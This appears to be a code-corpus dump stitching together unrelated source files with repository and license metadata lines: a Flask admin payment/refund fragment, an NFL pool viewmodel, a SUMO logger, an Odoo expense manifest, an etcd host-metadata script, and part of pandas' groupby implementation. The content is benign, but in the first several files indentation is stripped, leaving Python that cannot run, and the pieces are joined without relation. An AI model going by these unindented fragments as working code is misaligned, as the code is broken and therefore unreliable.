if form.bank_card.data != None and form.bank_card.data != 0:
user.pay_trans(trans=trans_instance, number = form.bank_card.data)
db.session.commit()
        flash(u'payment successful')
return redirect(url_for('admin.index'))
return render_template('admin/pay.html', form=form, list=alist)
@admin.route('/transaction/del', methods=['GET', 'POST'])
@login_required
def transaction_refund():
user = db.session.query(User.User).filter(User.User.id == current_user.get_id()).first()
# print(a)
if user:
wallet = user.wallet
# trans_instance = user.transaction
bill_list = user.bank_bill_item
# print(user.username)
# print(alist)
else:
flash("ERROR: can not find user")
return redirect(url_for('admin.index'))
form = PostTransactionReFundForm()
if form.validate_on_submit():
if form.serial_number.data != None:
flag = user.refund_trans(serial_number=int(form.serial_number.data))
else:
flash(u'choose one serial_number first')
return redirect(url_for('admin.index'))
db.session.commit()
if flag:
flash(u'refund successful')
# return redirect(url_for('admin.transaction_refund'))
return render_template('admin/refund.html', form=form, list=bill_list)
@admin.route('/check', methods=['GET', 'POST'])
@login_required
def check():
cost = BankBill.BankBillItem.get_total_money_in_date()
num = BankBill.BankBillItem.get_total_trans_number_in_date()
date = BankBill.BankBillItem.get_date()
bill_list = db.session.query(BankBill.BankBillItem).all()
return render_template('admin/check.html', cost = cost, number = num, data = date, list=bill_list)
# @admin.route('/category', methods=['GET', 'POST'])
# def category():
# clist = Category.query.all()
# form = PostCategoryForm()
# if form.validate_on_submit():
# category = Category(name=form.name.data)
# db.session.add(category)
# flash(u'Category added successfully')
# return redirect(url_for('admin.index'))
# return render_template('admin/category.html', form=form, list=clist)
# @admin.route('/category/del', methods=['GET'])
# @login_required
# def category_del():
# if request.args.get('id') is not None and request.args.get('a') == 'del':
# x = Category.query.filter_by(id=request.args.get('id')).first()
# if x is not None:
# db.session.delete(x)
# db.session.commit()
# flash(u'Deleted ' + x.name)
# return redirect(url_for('admin.category'))
# flash(u'Please check your input')
# return redirect(url_for('admin.category'))
| gpl-3.0 | -3,674,240,570,483,265,000 | 33.609195 | 102 | 0.591026 | false |
prcutler/nflpool | nflpool/viewmodels/playerpicks_viewmodel.py | 1 | 4310 | from nflpool.viewmodels.viewmodelbase import ViewModelBase
class PlayerPicksViewModel(ViewModelBase):
def __init__(self):
self.afc_east_winner_pick = None
self.afc_east_second = None
self.afc_east_last = None
self.afc_north_winner_pick = None
self.afc_north_second = None
self.afc_north_last = None
self.afc_south_winner_pick = None
self.afc_south_second = None
self.afc_south_last = None
self.afc_west_winner_pick = None
self.afc_west_second = None
self.afc_west_last = None
self.nfc_east_winner_pick = None
self.nfc_east_second = None
self.nfc_east_last = None
self.nfc_north_winner_pick = None
self.nfc_north_second = None
self.nfc_north_last = None
self.nfc_south_winner_pick = None
self.nfc_south_second = None
self.nfc_south_last = None
self.nfc_west_winner_pick = None
self.nfc_west_second = None
self.nfc_west_last = None
self.afc_qb_pick = None
self.nfc_qb_pick = None
self.afc_rb_pick = None
self.nfc_rb_pick = None
self.afc_rec_pick = None
self.nfc_rec_pick = None
self.afc_sacks_pick = None
self.nfc_sacks_pick = None
self.afc_int_pick = None
self.nfc_int_pick = None
self.afc_wildcard1_pick = None
self.afc_wildcard2_pick = None
self.nfc_wildcard1_pick = None
self.nfc_wildcard2_pick = None
self.afc_pf_pick = None
self.nfc_pf_pick = None
self.specialteams_td_pick = None
def from_dict(self, data_dict):
self.afc_east_winner_pick = data_dict.get("afc_east_winner_pick")
self.afc_east_second = data_dict.get("afc_east_second")
self.afc_east_last = data_dict.get("afc_east_last")
self.afc_north_winner_pick = data_dict.get("afc_north_winner_pick")
self.afc_north_second = data_dict.get("afc_north_second")
self.afc_north_last = data_dict.get("afc_north_last")
self.afc_south_winner_pick = data_dict.get("afc_south_winner_pick")
self.afc_south_second = data_dict.get("afc_south_second")
self.afc_south_last = data_dict.get("afc_south_last")
self.afc_west_winner_pick = data_dict.get("afc_west_winner_pick")
self.afc_west_second = data_dict.get("afc_west_second")
self.afc_west_last = data_dict.get("afc_west_last")
self.nfc_east_winner_pick = data_dict.get("nfc_east_winner_pick")
self.nfc_east_second = data_dict.get("nfc_east_second")
self.nfc_east_last = data_dict.get("nfc_east_last")
self.nfc_north_winner_pick = data_dict.get("nfc_north_winner_pick")
self.nfc_north_second = data_dict.get("nfc_north_second")
self.nfc_north_last = data_dict.get("nfc_north_last")
self.nfc_south_winner_pick = data_dict.get("nfc_south_winner_pick")
self.nfc_south_second = data_dict.get("nfc_south_second")
self.nfc_south_last = data_dict.get("nfc_south_last")
self.nfc_west_winner_pick = data_dict.get("nfc_west_winner_pick")
self.nfc_west_second = data_dict.get("nfc_west_second")
self.nfc_west_last = data_dict.get("nfc_west_last")
self.afc_qb_pick = data_dict.get("afc_qb_pick")
self.nfc_qb_pick = data_dict.get("nfc_qb_pick")
self.afc_rb_pick = data_dict.get("afc_rb_pick")
self.nfc_rb_pick = data_dict.get("nfc_rb_pick")
self.afc_rec_pick = data_dict.get("afc_rec_pick")
self.nfc_rec_pick = data_dict.get("nfc_rec_pick")
self.afc_sacks_pick = data_dict.get("afc_sacks_pick")
self.nfc_sacks_pick = data_dict.get("nfc_sacks_pick")
self.afc_int_pick = data_dict.get("afc_int_pick")
self.nfc_int_pick = data_dict.get("nfc_int_pick")
self.afc_wildcard1_pick = data_dict.get("afc_wildcard1_pick")
self.afc_wildcard2_pick = data_dict.get("afc_wildcard2_pick")
self.nfc_wildcard1_pick = data_dict.get("nfc_wildcard1_pick")
self.nfc_wildcard2_pick = data_dict.get("nfc_wildcard2_pick")
self.afc_pf_pick = data_dict.get("afc_pf_pick")
self.nfc_pf_pick = data_dict.get("nfc_pf_pick")
self.specialteams_td_pick = data_dict.get("specialteams_td_pick")
| mit | 2,485,024,036,205,383,700 | 47.426966 | 75 | 0.623666 | false |
702nADOS/sumo | tools/contributed/sumopy/agilepy/lib_base/logger.py | 1 | 1227 | import types
class Logger:
def __init__(self, filepath=None, is_stdout=True):
self._filepath = filepath
self._logfile = None
self._callbacks = {}
self._is_stdout = is_stdout
def start(self, text=''):
if self._filepath != None:
self._logfile = open(self._filepath, 'w')
self._logfile.write(text + '\n')
else:
self._logfile = None
print text
def add_callback(self, function, key='message'):
self._callbacks[key] = function
def progress(self, percent):
pass
def w(self, data, key='message', **kwargs):
# print 'w:',data,self._callbacks
if self._logfile != None:
self._logfile.write(str(data) + '\n')
elif self._callbacks.has_key(key):
kwargs['key'] = key
self._callbacks[key](data, **kwargs)
# elif type(data)==types.StringType:
# print data
if self._is_stdout:
print str(data)
def stop(self, text=''):
if self._logfile != None:
self._logfile.write(text + '\n')
self._logfile.close()
self._logfile = None
else:
print text
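# Minimal usage sketch (hypothetical file path):
#   logger = Logger(filepath='/tmp/run.log', is_stdout=True)
#   logger.start('run started')
#   logger.w('building network...')
#   logger.stop('run finished')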
| gpl-3.0 | 895,495,032,246,819,500 | 26.266667 | 54 | 0.519152 | false |
ayepezv/GAD_ERP | addons/hr_expense/__openerp__.py | 2 | 1889 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': 'Expense Tracker',
'version': '2.0',
'category': 'Human Resources',
'sequence': 95,
'summary': 'Expenses Validation, Invoicing',
'description': """
Manage expenses by Employees
============================
This application allows you to manage your employees' daily expenses. It gives you access to your employees' fee notes and gives you the right to complete and validate or refuse the notes. After validation it creates an invoice for the employee.
Employees can encode their own expenses and the validation flow puts them automatically in the accounting after validation by managers.
The whole flow is implemented as:
---------------------------------
* Draft expense
* Submitted by the employee to his manager
* Approved by his manager
* Validation by the accountant and accounting entries creation
This module also uses analytic accounting and is compatible with the invoice on timesheet module so that you are able to automatically re-invoice your customers' expenses if you work by project.
""",
'website': 'https://www.odoo.com/page/expenses',
'depends': ['hr_contract', 'account_accountant', 'report', 'web_tour'],
'data': [
'security/ir.model.access.csv',
'data/hr_expense_data.xml',
'data/hr_expense_sequence.xml',
'wizard/hr_expense_refuse_reason.xml',
'wizard/hr_expense_register_payment.xml',
'views/hr_expense_views.xml',
'security/ir_rule.xml',
'report/report_expense_sheet.xml',
'views/hr_dashboard.xml',
'views/hr_expense.xml',
'views/tour_views.xml',
'views/res_config_views.xml',
'data/web_planner_data.xml',
],
'demo': ['data/hr_expense_demo.xml'],
'installable': True,
'application': True,
}
| gpl-3.0 | -3,994,445,756,238,314,000 | 38.3125 | 244 | 0.661897 | false |
meatballhat/ansible-inventory-hacks | ansible_inventory_hacks/etcd/touch.py | 1 | 2242 | #!/usr/bin/env python
# vim:fileencoding=utf-8
import argparse
import datetime
import os
import socket
import subprocess
import sys
import etcd
from . import DEFAULT_PREFIX
ETCD_KEY_TMPL = '{prefix}/{hostname}/{key}'
USAGE = """%(prog)s [options]
Splat some metadata into etcd!
"""
def main(sysargs=sys.argv[:]):
parser = argparse.ArgumentParser(
usage=USAGE, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'hostname', metavar='ANSIBLE_HOSTNAME',
default=os.getenv('ANSIBLE_HOSTNAME'),
help='hostname that is being touched')
parser.add_argument(
'-s', '--server', metavar='ETCD_SERVER',
default=os.getenv('ETCD_SERVER', '127.0.0.1'),
help='etcd server ip or hostname')
parser.add_argument(
'-p', '--prefix', metavar='ETCD_PREFIX',
default=os.getenv('ETCD_PREFIX', DEFAULT_PREFIX),
help='etcd key prefix')
parser.add_argument(
'-P', '--playbook', metavar='ANSIBLE_PLAYBOOK',
default=os.getenv('ANSIBLE_PLAYBOOK'),
help='the name of the playbook that is being run')
parser.add_argument(
'-T', '--team', metavar='TEAM',
default=os.environ.get('TEAM', 'UNKNOWN'),
help='the team name that will be included in the touch metadata')
args = parser.parse_args(sysargs[1:])
client = etcd.Client(host=args.server)
_set_metadata(client, args.playbook, args.hostname, args.team, args.prefix)
return 0
def _set_metadata(client, playbook, hostname, team, prefix):
for key, value in _etcd_metadata(playbook, hostname, team).iteritems():
etcd_key = ETCD_KEY_TMPL.format(
prefix=prefix, hostname=hostname, key=key)
client.set(etcd_key, value)
def _etcd_metadata(playbook, hostname, team):
return {
'playbook': playbook,
'hostname': hostname,
'local_user': os.getlogin(),
'local_host': socket.gethostname(),
'local_git_ref': _git_ref(),
'timestamp': datetime.datetime.utcnow().isoformat(),
'team': team,
}
def _git_ref():
return subprocess.check_output(['git', 'rev-parse', '-q', 'HEAD']).strip()
if __name__ == '__main__':
sys.exit(main())
| mit | -579,326,199,278,497,900 | 27.74359 | 79 | 0.630687 | false |
datapythonista/pandas | pandas/core/groupby/generic.py | 1 | 63278 | """
Define the SeriesGroupBy and DataFrameGroupBy
classes that hold the groupby interfaces (and some implementations).
These are user facing as the result of the ``df.groupby(...)`` operations,
which here returns a DataFrameGroupBy object.
"""
from __future__ import annotations
from collections import (
abc,
namedtuple,
)
from functools import partial
from textwrap import dedent
from typing import (
Any,
Callable,
Hashable,
Iterable,
Mapping,
TypeVar,
Union,
)
import warnings
import numpy as np
from pandas._libs import (
lib,
reduction as libreduction,
)
from pandas._typing import (
ArrayLike,
FrameOrSeries,
FrameOrSeriesUnion,
Manager2D,
)
from pandas.util._decorators import (
Appender,
Substitution,
doc,
)
from pandas.core.dtypes.common import (
ensure_int64,
is_bool,
is_categorical_dtype,
is_dict_like,
is_integer_dtype,
is_interval_dtype,
is_numeric_dtype,
is_scalar,
)
from pandas.core.dtypes.missing import (
isna,
notna,
)
from pandas.core import (
algorithms,
nanops,
)
from pandas.core.aggregation import (
maybe_mangle_lambdas,
reconstruct_func,
validate_func_kwargs,
)
from pandas.core.apply import GroupByApply
from pandas.core.base import (
DataError,
SpecificationError,
)
import pandas.core.common as com
from pandas.core.construction import create_series_with_explicit_dtype
from pandas.core.frame import DataFrame
from pandas.core.generic import NDFrame
from pandas.core.groupby import base
from pandas.core.groupby.groupby import (
GroupBy,
_agg_template,
_apply_docs,
_transform_template,
group_selection_context,
)
from pandas.core.indexes.api import (
Index,
MultiIndex,
all_indexes_same,
)
from pandas.core.series import Series
from pandas.core.util.numba_ import maybe_use_numba
from pandas.plotting import boxplot_frame_groupby
NamedAgg = namedtuple("NamedAgg", ["column", "aggfunc"])
# TODO(typing) the return value on this callable should be any *scalar*.
AggScalar = Union[str, Callable[..., Any]]
# TODO: validate types on ScalarResult and move to _typing
# Blocked from using by https://github.com/python/mypy/issues/1484
# See note at _mangle_lambda_list
ScalarResult = TypeVar("ScalarResult")
def generate_property(name: str, klass: type[FrameOrSeries]):
"""
Create a property for a GroupBy subclass to dispatch to DataFrame/Series.
Parameters
----------
name : str
klass : {DataFrame, Series}
Returns
-------
property
"""
def prop(self):
return self._make_wrapper(name)
parent_method = getattr(klass, name)
prop.__doc__ = parent_method.__doc__ or ""
prop.__name__ = name
return property(prop)
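# For example, generate_property("skew", DataFrame) returns a read-only property whose
# getter calls self._make_wrapper("skew"), dispatching attribute access on the GroupBy
# object to the DataFrame method of the same name ("skew" is just an illustrative name).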
def pin_allowlisted_properties(klass: type[FrameOrSeries], allowlist: frozenset[str]):
"""
    Create GroupBy member defs for DataFrame/Series names in an allowlist.
Parameters
----------
klass : DataFrame or Series class
class where members are defined.
allowlist : frozenset[str]
Set of names of klass methods to be constructed
Returns
-------
class decorator
Notes
-----
Since we don't want to override methods explicitly defined in the
base class, any such name is skipped.
"""
def pinner(cls):
for name in allowlist:
if hasattr(cls, name):
# don't override anything that was explicitly defined
# in the base class
continue
prop = generate_property(name, klass)
setattr(cls, name, prop)
return cls
return pinner
@pin_allowlisted_properties(Series, base.series_apply_allowlist)
class SeriesGroupBy(GroupBy[Series]):
_apply_allowlist = base.series_apply_allowlist
def _iterate_slices(self) -> Iterable[Series]:
yield self._selected_obj
_agg_examples_doc = dedent(
"""
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.groupby([1, 1, 2, 2]).min()
1 1
2 3
dtype: int64
>>> s.groupby([1, 1, 2, 2]).agg('min')
1 1
2 3
dtype: int64
>>> s.groupby([1, 1, 2, 2]).agg(['min', 'max'])
min max
1 1 2
2 3 4
The output column names can be controlled by passing
the desired column names and aggregations as keyword arguments.
>>> s.groupby([1, 1, 2, 2]).agg(
... minimum='min',
... maximum='max',
... )
minimum maximum
1 1 2
2 3 4
.. versionchanged:: 1.3.0
The resulting dtype will reflect the return value of the aggregating function.
>>> s.groupby([1, 1, 2, 2]).agg(lambda x: x.astype(float).min())
1 1.0
2 3.0
dtype: float64"""
)
@Appender(
_apply_docs["template"].format(
input="series", examples=_apply_docs["series_examples"]
)
)
def apply(self, func, *args, **kwargs):
return super().apply(func, *args, **kwargs)
@doc(_agg_template, examples=_agg_examples_doc, klass="Series")
def aggregate(self, func=None, *args, engine=None, engine_kwargs=None, **kwargs):
if maybe_use_numba(engine):
with group_selection_context(self):
data = self._selected_obj
result, index = self._aggregate_with_numba(
data.to_frame(), func, *args, engine_kwargs=engine_kwargs, **kwargs
)
return self.obj._constructor(result.ravel(), index=index, name=data.name)
relabeling = func is None
columns = None
if relabeling:
columns, func = validate_func_kwargs(kwargs)
kwargs = {}
if isinstance(func, str):
return getattr(self, func)(*args, **kwargs)
elif isinstance(func, abc.Iterable):
# Catch instances of lists / tuples
# but not the class list / tuple itself.
func = maybe_mangle_lambdas(func)
ret = self._aggregate_multiple_funcs(func)
if relabeling:
# error: Incompatible types in assignment (expression has type
# "Optional[List[str]]", variable has type "Index")
ret.columns = columns # type: ignore[assignment]
return ret
else:
cyfunc = com.get_cython_func(func)
if cyfunc and not args and not kwargs:
return getattr(self, cyfunc)()
if self.grouper.nkeys > 1:
return self._python_agg_general(func, *args, **kwargs)
try:
return self._python_agg_general(func, *args, **kwargs)
except KeyError:
# TODO: KeyError is raised in _python_agg_general,
# see test_groupby.test_basic
result = self._aggregate_named(func, *args, **kwargs)
index = Index(sorted(result), name=self.grouper.names[0])
return create_series_with_explicit_dtype(
result, index=index, dtype_if_empty=object
)
agg = aggregate
def _aggregate_multiple_funcs(self, arg) -> DataFrame:
if isinstance(arg, dict):
# show the deprecation, but only if we
# have not shown a higher level one
# GH 15931
raise SpecificationError("nested renamer is not supported")
elif any(isinstance(x, (tuple, list)) for x in arg):
arg = [(x, x) if not isinstance(x, (tuple, list)) else x for x in arg]
# indicated column order
columns = next(zip(*arg))
else:
# list of functions / function names
columns = []
for f in arg:
columns.append(com.get_callable_name(f) or f)
arg = zip(columns, arg)
results: dict[base.OutputKey, FrameOrSeriesUnion] = {}
for idx, (name, func) in enumerate(arg):
key = base.OutputKey(label=name, position=idx)
results[key] = self.aggregate(func)
if any(isinstance(x, DataFrame) for x in results.values()):
from pandas import concat
res_df = concat(
results.values(), axis=1, keys=[key.label for key in results.keys()]
)
# error: Incompatible return value type (got "Union[DataFrame, Series]",
# expected "DataFrame")
return res_df # type: ignore[return-value]
indexed_output = {key.position: val for key, val in results.items()}
output = self.obj._constructor_expanddim(indexed_output, index=None)
output.columns = Index(key.label for key in results)
output = self._reindex_output(output)
return output
def _cython_agg_general(
self, how: str, alt: Callable, numeric_only: bool, min_count: int = -1
):
obj = self._selected_obj
objvals = obj._values
data = obj._mgr
if numeric_only and not is_numeric_dtype(obj.dtype):
# GH#41291 match Series behavior
raise NotImplementedError(
f"{type(self).__name__}.{how} does not implement numeric_only."
)
# This is overkill because it is only called once, but is here to
# mirror the array_func used in DataFrameGroupBy._cython_agg_general
def array_func(values: ArrayLike) -> ArrayLike:
try:
result = self.grouper._cython_operation(
"aggregate", values, how, axis=data.ndim - 1, min_count=min_count
)
except NotImplementedError:
# generally if we have numeric_only=False
# and non-applicable functions
# try to python agg
# TODO: shouldn't min_count matter?
result = self._agg_py_fallback(values, ndim=data.ndim, alt=alt)
return result
result = array_func(objvals)
ser = self.obj._constructor(
result, index=self.grouper.result_index, name=obj.name
)
return self._reindex_output(ser)
def _wrap_aggregated_output(
self,
output: Mapping[base.OutputKey, Series | ArrayLike],
) -> Series:
"""
Wraps the output of a SeriesGroupBy aggregation into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, ArrayLike]]
Data to wrap.
Returns
-------
Series
Notes
-----
In the vast majority of cases output will only contain one element.
The exception is operations that expand dimensions, like ohlc.
"""
assert len(output) == 1
name = self.obj.name
index = self.grouper.result_index
values = next(iter(output.values()))
result = self.obj._constructor(values, index=index, name=name)
return self._reindex_output(result)
def _wrap_transformed_output(
self, output: Mapping[base.OutputKey, Series | ArrayLike]
) -> Series:
"""
Wraps the output of a SeriesGroupBy aggregation into the expected result.
Parameters
----------
output : dict[base.OutputKey, Union[Series, np.ndarray, ExtensionArray]]
Dict with a sole key of 0 and a value of the result values.
Returns
-------
Series
Notes
-----
output should always contain one element. It is specified as a dict
for consistency with DataFrame methods and _wrap_aggregated_output.
"""
assert len(output) == 1
name = self.obj.name
values = next(iter(output.values()))
result = self.obj._constructor(values, index=self.obj.index, name=name)
# No transformations increase the ndim of the result
assert isinstance(result, Series)
return result
def _wrap_applied_output(
self,
data: Series,
keys: Index,
values: list[Any] | None,
not_indexed_same: bool = False,
) -> FrameOrSeriesUnion:
"""
Wrap the output of SeriesGroupBy.apply into the expected result.
Parameters
----------
data : Series
Input data for groupby operation.
keys : Index
Keys of groups that Series was grouped by.
values : Optional[List[Any]]
Applied output for each group.
not_indexed_same : bool, default False
Whether the applied outputs are not indexed the same as the group axes.
Returns
-------
DataFrame or Series
"""
if len(keys) == 0:
# GH #6265
return self.obj._constructor(
[],
name=self.obj.name,
index=self.grouper.result_index,
dtype=data.dtype,
)
assert values is not None
def _get_index() -> Index:
if self.grouper.nkeys > 1:
index = MultiIndex.from_tuples(keys, names=self.grouper.names)
else:
index = Index(keys, name=self.grouper.names[0])
return index
if isinstance(values[0], dict):
# GH #823 #24880
index = _get_index()
res_df = self.obj._constructor_expanddim(values, index=index)
res_df = self._reindex_output(res_df)
# if self.observed is False,
# keep all-NaN rows created while re-indexing
res_ser = res_df.stack(dropna=self.observed)
res_ser.name = self.obj.name
return res_ser
elif isinstance(values[0], (Series, DataFrame)):
return self._concat_objects(keys, values, not_indexed_same=not_indexed_same)
else:
# GH #6265 #24880
result = self.obj._constructor(
data=values, index=_get_index(), name=self.obj.name
)
return self._reindex_output(result)
def _aggregate_named(self, func, *args, **kwargs):
# Note: this is very similar to _aggregate_series_pure_python,
# but that does not pin group.name
result = {}
initialized = False
for name, group in self:
# Each step of this loop corresponds to
# libreduction._BaseGrouper._apply_to_group
# NB: libreduction does not pin name
object.__setattr__(group, "name", name)
output = func(group, *args, **kwargs)
output = libreduction.extract_result(output)
if not initialized:
# We only do this validation on the first iteration
libreduction.check_result_array(output, group.dtype)
initialized = True
result[name] = output
return result
@Substitution(klass="Series")
@Appender(_transform_template)
def transform(self, func, *args, engine=None, engine_kwargs=None, **kwargs):
return self._transform(
func, *args, engine=engine, engine_kwargs=engine_kwargs, **kwargs
)
def _cython_transform(
self, how: str, numeric_only: bool = True, axis: int = 0, **kwargs
):
assert axis == 0 # handled by caller
obj = self._selected_obj
is_numeric = is_numeric_dtype(obj.dtype)
if numeric_only and not is_numeric:
raise DataError("No numeric types to aggregate")
try:
result = self.grouper._cython_operation(
"transform", obj._values, how, axis, **kwargs
)
except (NotImplementedError, TypeError):
raise DataError("No numeric types to aggregate")
return obj._constructor(result, index=self.obj.index, name=obj.name)
def _transform_general(self, func: Callable, *args, **kwargs) -> Series:
"""
Transform with a callable func`.
"""
assert callable(func)
klass = type(self.obj)
results = []
for name, group in self:
# this setattr is needed for test_transform_lambda_with_datetimetz
object.__setattr__(group, "name", name)
res = func(group, *args, **kwargs)
results.append(klass(res, index=group.index))
# check for empty "results" to avoid concat ValueError
if results:
from pandas.core.reshape.concat import concat
concatenated = concat(results)
result = self._set_result_index_ordered(concatenated)
else:
result = self.obj._constructor(dtype=np.float64)
result.name = self.obj.name
# error: Incompatible return value type (got "Union[DataFrame, Series]",
# expected "Series")
return result # type: ignore[return-value]
def _can_use_transform_fast(self, result) -> bool:
return True
def _wrap_transform_fast_result(self, result: Series) -> Series:
"""
fast version of transform, only applicable to
builtin/cythonizable functions
"""
ids, _, _ = self.grouper.group_info
result = result.reindex(self.grouper.result_index, copy=False)
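        # broadcast each group's aggregated value back onto that group's original rows
        # by taking from the group-indexed result with the per-row group ids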
out = algorithms.take_nd(result._values, ids)
return self.obj._constructor(out, index=self.obj.index, name=self.obj.name)
def filter(self, func, dropna: bool = True, *args, **kwargs):
"""
Return a copy of a Series excluding elements from groups that
do not satisfy the boolean criterion specified by func.
Parameters
----------
func : function
To apply to each group. Should return True or False.
dropna : Drop groups that do not pass the filter. True by default;
if False, groups that evaluate False are filled with NaNs.
Notes
-----
Functions that mutate the passed object can produce unexpected
behavior or errors and are not supported. See :ref:`gotchas.udf-mutation`
for more details.
Examples
--------
>>> df = pd.DataFrame({'A' : ['foo', 'bar', 'foo', 'bar',
... 'foo', 'bar'],
... 'B' : [1, 2, 3, 4, 5, 6],
... 'C' : [2.0, 5., 8., 1., 2., 9.]})
>>> grouped = df.groupby('A')
>>> df.groupby('A').B.filter(lambda x: x.mean() > 3.)
1 2
3 4
5 6
Name: B, dtype: int64
Returns
-------
filtered : Series
"""
if isinstance(func, str):
wrapper = lambda x: getattr(x, func)(*args, **kwargs)
else:
wrapper = lambda x: func(x, *args, **kwargs)
# Interpret np.nan as False.
def true_and_notna(x) -> bool:
b = wrapper(x)
return b and notna(b)
try:
indices = [
self._get_index(name) for name, group in self if true_and_notna(group)
]
except (ValueError, TypeError) as err:
raise TypeError("the filter must return a boolean result") from err
filtered = self._apply_filter(indices, dropna)
return filtered
def nunique(self, dropna: bool = True) -> Series:
"""
Return number of unique elements in the group.
Returns
-------
Series
Number of unique values within each group.
"""
ids, _, _ = self.grouper.group_info
val = self.obj._values
codes, _ = algorithms.factorize(val, sort=False)
sorter = np.lexsort((codes, ids))
codes = codes[sorter]
ids = ids[sorter]
# group boundaries are where group ids change
# unique observations are where sorted values change
idx = np.r_[0, 1 + np.nonzero(ids[1:] != ids[:-1])[0]]
inc = np.r_[1, codes[1:] != codes[:-1]]
# 1st item of each group is a new unique observation
mask = codes == -1
if dropna:
inc[idx] = 1
inc[mask] = 0
else:
inc[mask & np.r_[False, mask[:-1]]] = 0
inc[idx] = 1
out = np.add.reduceat(inc, idx).astype("int64", copy=False)
if len(ids):
# NaN/NaT group exists if the head of ids is -1,
# so remove it from res and exclude its index from idx
if ids[0] == -1:
res = out[1:]
idx = idx[np.flatnonzero(idx)]
else:
res = out
else:
res = out[1:]
ri = self.grouper.result_index
# we might have duplications among the bins
if len(res) != len(ri):
res, out = np.zeros(len(ri), dtype=out.dtype), res
res[ids[idx]] = out
result = self.obj._constructor(res, index=ri, name=self.obj.name)
return self._reindex_output(result, fill_value=0)
@doc(Series.describe)
def describe(self, **kwargs):
result = self.apply(lambda x: x.describe(**kwargs))
if self.axis == 1:
return result.T
return result.unstack()
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
bins=None,
dropna: bool = True,
):
from pandas.core.reshape.merge import get_join_indexers
from pandas.core.reshape.tile import cut
ids, _, _ = self.grouper.group_info
val = self.obj._values
def apply_series_value_counts():
return self.apply(
Series.value_counts,
normalize=normalize,
sort=sort,
ascending=ascending,
bins=bins,
)
if bins is not None:
if not np.iterable(bins):
# scalar bins cannot be done at top level
# in a backward compatible way
return apply_series_value_counts()
elif is_categorical_dtype(val.dtype):
# GH38672
return apply_series_value_counts()
# groupby removes null keys from groupings
mask = ids != -1
ids, val = ids[mask], val[mask]
if bins is None:
lab, lev = algorithms.factorize(val, sort=True)
llab = lambda lab, inc: lab[inc]
else:
# lab is a Categorical with categories an IntervalIndex
lab = cut(Series(val), bins, include_lowest=True)
# error: "ndarray" has no attribute "cat"
lev = lab.cat.categories # type: ignore[attr-defined]
# error: No overload variant of "take" of "_ArrayOrScalarCommon" matches
# argument types "Any", "bool", "Union[Any, float]"
lab = lev.take( # type: ignore[call-overload]
# error: "ndarray" has no attribute "cat"
lab.cat.codes, # type: ignore[attr-defined]
allow_fill=True,
# error: Item "ndarray" of "Union[ndarray, Index]" has no attribute
# "_na_value"
fill_value=lev._na_value, # type: ignore[union-attr]
)
llab = lambda lab, inc: lab[inc]._multiindex.codes[-1]
if is_interval_dtype(lab.dtype):
# TODO: should we do this inside II?
# error: "ndarray" has no attribute "left"
# error: "ndarray" has no attribute "right"
sorter = np.lexsort(
(lab.left, lab.right, ids) # type: ignore[attr-defined]
)
else:
sorter = np.lexsort((lab, ids))
ids, lab = ids[sorter], lab[sorter]
# group boundaries are where group ids change
idchanges = 1 + np.nonzero(ids[1:] != ids[:-1])[0]
idx = np.r_[0, idchanges]
if not len(ids):
idx = idchanges
# new values are where sorted labels change
lchanges = llab(lab, slice(1, None)) != llab(lab, slice(None, -1))
inc = np.r_[True, lchanges]
if not len(lchanges):
inc = lchanges
inc[idx] = True # group boundaries are also new values
out = np.diff(np.nonzero(np.r_[inc, True])[0]) # value counts
# num. of times each group should be repeated
rep = partial(np.repeat, repeats=np.add.reduceat(inc, idx))
# multi-index components
codes = self.grouper.reconstructed_codes
codes = [rep(level_codes) for level_codes in codes] + [llab(lab, inc)]
levels = [ping.group_index for ping in self.grouper.groupings] + [lev]
names = self.grouper.names + [self.obj.name]
if dropna:
mask = codes[-1] != -1
if mask.all():
dropna = False
else:
out, codes = out[mask], [level_codes[mask] for level_codes in codes]
if normalize:
out = out.astype("float")
d = np.diff(np.r_[idx, len(ids)])
if dropna:
m = ids[lab == -1]
np.add.at(d, m, -1)
acc = rep(d)[mask]
else:
acc = rep(d)
out /= acc
if sort and bins is None:
cat = ids[inc][mask] if dropna else ids[inc]
sorter = np.lexsort((out if ascending else -out, cat))
out, codes[-1] = out[sorter], codes[-1][sorter]
if bins is not None:
# for compat. with libgroupby.value_counts need to ensure every
# bin is present at every index level, null filled with zeros
diff = np.zeros(len(out), dtype="bool")
for level_codes in codes[:-1]:
diff |= np.r_[True, level_codes[1:] != level_codes[:-1]]
ncat, nbin = diff.sum(), len(levels[-1])
left = [np.repeat(np.arange(ncat), nbin), np.tile(np.arange(nbin), ncat)]
right = [diff.cumsum() - 1, codes[-1]]
_, idx = get_join_indexers(left, right, sort=False, how="left")
out = np.where(idx != -1, out[idx], 0)
if sort:
sorter = np.lexsort((out if ascending else -out, left[0]))
out, left[-1] = out[sorter], left[-1][sorter]
# build the multi-index w/ full levels
def build_codes(lev_codes: np.ndarray) -> np.ndarray:
return np.repeat(lev_codes[diff], nbin)
codes = [build_codes(lev_codes) for lev_codes in codes[:-1]]
codes.append(left[-1])
mi = MultiIndex(levels=levels, codes=codes, names=names, verify_integrity=False)
if is_integer_dtype(out.dtype):
out = ensure_int64(out)
return self.obj._constructor(out, index=mi, name=self.obj.name)
def count(self) -> Series:
"""
Compute count of group, excluding missing values.
Returns
-------
Series
Count of values within each group.
"""
ids, _, ngroups = self.grouper.group_info
val = self.obj._values
mask = (ids != -1) & ~isna(val)
minlength = ngroups or 0
out = np.bincount(ids[mask], minlength=minlength)
result = self.obj._constructor(
out,
index=self.grouper.result_index,
name=self.obj.name,
dtype="int64",
)
return self._reindex_output(result, fill_value=0)
def pct_change(self, periods=1, fill_method="pad", limit=None, freq=None):
"""Calculate pct_change of each value to previous entry in group"""
# TODO: Remove this conditional when #23918 is fixed
if freq:
return self.apply(
lambda x: x.pct_change(
periods=periods, fill_method=fill_method, limit=limit, freq=freq
)
)
if fill_method is None: # GH30463
fill_method = "pad"
limit = 0
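        # fill within the original object, regroup on the same codes, and compare each
        # value with the shifted value from its own group: pct_change = filled / shifted - 1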
filled = getattr(self, fill_method)(limit=limit)
fill_grp = filled.groupby(self.grouper.codes)
shifted = fill_grp.shift(periods=periods, freq=freq)
return (filled / shifted) - 1
@pin_allowlisted_properties(DataFrame, base.dataframe_apply_allowlist)
